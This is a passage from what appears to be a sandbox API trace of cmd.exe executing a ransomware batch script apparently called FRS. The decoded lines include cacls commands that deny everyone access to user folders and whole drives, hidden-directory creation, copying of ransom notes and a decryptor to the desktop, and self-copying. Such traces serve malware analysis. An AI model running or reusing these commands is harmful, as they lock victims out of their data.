\"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0109.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.748] GetFileType (hFile=0x260) returned 0x1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0109.748] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0109.748] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0109.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.748] GetFileType (hFile=0x260) returned 0x1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0109.748] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0109.748] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0109.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.748] GetFileType (hFile=0x260) returned 0x1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0109.748] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0109.748] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0109.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.748] GetFileType (hFile=0x260) returned 0x1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0109.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0109.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0109.749] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.749] GetFileType (hFile=0x260) returned 0x1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0109.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0109.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0109.749] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.749] GetFileType (hFile=0x260) returned 0x1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0109.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0109.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0109.749] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.749] GetFileType (hFile=0x260) returned 0x1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0109.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0109.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0109.749] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.749] GetFileType (hFile=0x260) returned 0x1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0109.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0109.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0109.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.750] GetFileType (hFile=0x260) returned 0x1 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0109.750] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0109.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0109.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.750] GetFileType (hFile=0x260) returned 0x1 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0109.750] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0109.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0109.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.750] GetFileType (hFile=0x260) returned 0x1 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0109.750] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0109.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0109.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.750] GetFileType (hFile=0x260) returned 0x1 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0109.750] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0109.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0109.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0109.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.751] GetFileType (hFile=0x260) returned 0x1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0109.751] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0109.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0109.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.751] GetFileType (hFile=0x260) returned 0x1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0109.751] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0109.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0109.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.751] GetFileType (hFile=0x260) returned 0x1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0109.751] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0109.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0109.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.751] GetFileType (hFile=0x260) returned 0x1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0109.751] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0109.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0109.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.751] GetFileType (hFile=0x260) returned 0x1 [0109.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0109.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0109.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0109.752] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.752] GetFileType (hFile=0x260) returned 0x1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0109.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0109.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0109.752] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.752] GetFileType (hFile=0x260) returned 0x1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0109.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0109.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0109.752] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.752] GetFileType (hFile=0x260) returned 0x1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0109.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0109.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0109.752] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.752] GetFileType (hFile=0x260) returned 0x1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0109.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0109.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0109.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.753] GetFileType (hFile=0x260) returned 0x1 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0109.753] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0109.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0109.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.753] GetFileType (hFile=0x260) returned 0x1 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0109.753] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0109.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0109.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.753] GetFileType (hFile=0x260) returned 0x1 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 